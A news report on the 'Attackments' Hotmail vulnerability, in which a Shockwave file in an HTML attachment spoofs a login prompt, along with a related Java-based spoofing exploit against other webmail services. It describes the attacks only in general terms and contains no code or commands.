A Canadian Web developer reported another security vulnerability in free, Web-based email services Monday, the third inside of a week.
"We're issuing a general alert that Hotmail users should, under no circumstances, view their email attachments, because they're handled insecurely by Hotmail," said Web developer Tom Cervenka, who created, then reported, the exploit.
Dubbed Attackments, the vulnerability centers around HTML attachments. A Macromedia Shockwave file accompanying the attachment spoofs a Hotmail time-out message, duping the user into entering his username and password, which is then emailed back to a cracker.
"Right now, all we're really saying is [that] we're aware of the problem, and we're looking into it," said Hotmail spokesman Peter Ross. He said he did not know when the problem would be fixed.
Cervenka and fellow programmer Cody Kostiuk wrote a Shockwave demonstration to verify the vulnerability.
"The way it works is when a user views an HTML attachment, the Shockwave replaces the user interface controls with new controls that are completely in the control of the malicious user, who can use them in any way," Cervenka said.
The principle behind this Shockwave-powered vulnerability is the same as the JavaScript and Java-based vulnerabilities Cervenka reported last week. The problem derives in part from the fact that free Web-based email services don't filter the technologies.
His Trojavan Horse Exploit used a Java applet to do the spoofing and affected Yahoo! Mail, Lycos Mail, MailCity, Eudora Mail, and MailExcite at the time of its discovery last week.
The exploits show what could happen in other areas -- such as corporate email systems -- as new technologies allow email to expand beyond its text-based roots.
"[The Trojavan horse] is significant since all users have to do to be infected is open an email message," said Forrester Research analyst Ted Julian last Friday. "They don't need to save and run an attachment or go to a Web page on the Net."
